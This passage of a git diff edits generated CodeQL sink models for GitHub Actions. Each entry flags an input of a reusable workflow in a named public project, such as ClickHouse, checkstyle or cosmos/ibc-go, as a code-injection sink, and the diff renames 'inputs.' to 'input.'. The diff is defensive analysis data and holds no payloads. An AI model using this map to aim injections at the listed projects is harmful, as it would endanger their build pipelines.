["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 339d7b1dd0a2..fd0a2d9110a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "inputs.features", "code-injection", "generated"] \ No newline at end of file + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index ff0f83454c2d..1a3bdd1b3803 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.config_file", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wamr_app_framework_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.os", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index c07d2aba0b6c..6185f9d03d05 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.destination-tag", "code-injection", "generated"] - - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.origin-tag", "code-injection", "generated"] \ No newline at end of file + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 77a7eaae309f..273bbc695405 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cemu-project/cemu/.github/workflows/build.yml", "*", "inputs.experimentalversion", "code-injection", "generated"] \ No newline at end of file + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 09299774b6a6..3aac3af3cae6 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -3,27 +3,27 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-engine-association", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-generator", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-platform", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-toolchain", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.extra-choco-packages", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.clang-version", "code-injection", "generated"] \ No newline at end of file + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-toolchain", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 028210d4eac9..9887b8e5f3ae 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cgal/cgal/.github/workflows/send_email.yml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 2ea83d9d94b9..4c6379fd94b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 69f1b740c968..35738fe6c0f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.docker-context", "code-injection", "generated"] - - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.image_subpath", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 61af1d324413..77db768cf32e 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.scala", "code-injection", "generated"] - - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.circt", "code-injection", "generated"] \ No newline at end of file + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 1532fc723aa9..509de9546464 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.test_name", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.run_command", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.working-directory", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.additional_envs", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.test_name", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.run_command", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.working-directory", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.additional_envs", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "inputs.set_latest", "code-injection", "generated"] \ No newline at end of file + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "input.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index f4a7cd26183d..6e0e2865e83c 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 119bfeaa7969..175012c10c94 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_sim", "code-injection", "generated"] - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_nosim", "code-injection", "generated"] - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.group", "code-injection", "generated"] \ No newline at end of file + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 10ea343b7aab..84a834d9a1f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 6310b7155d32..2946a78cf835 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.millargs", "code-injection", "generated"] - - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.buildcmd", "code-injection", "generated"] \ No newline at end of file + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index a1de7e9a8f93..7ce68d84ca5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.upgrade-plan-name", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-upgrade-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-type", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-image", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-b-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-a-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-image", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test-entry-point", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-suite", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-file-directory", "code-injection", "generated"] \ No newline at end of file + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 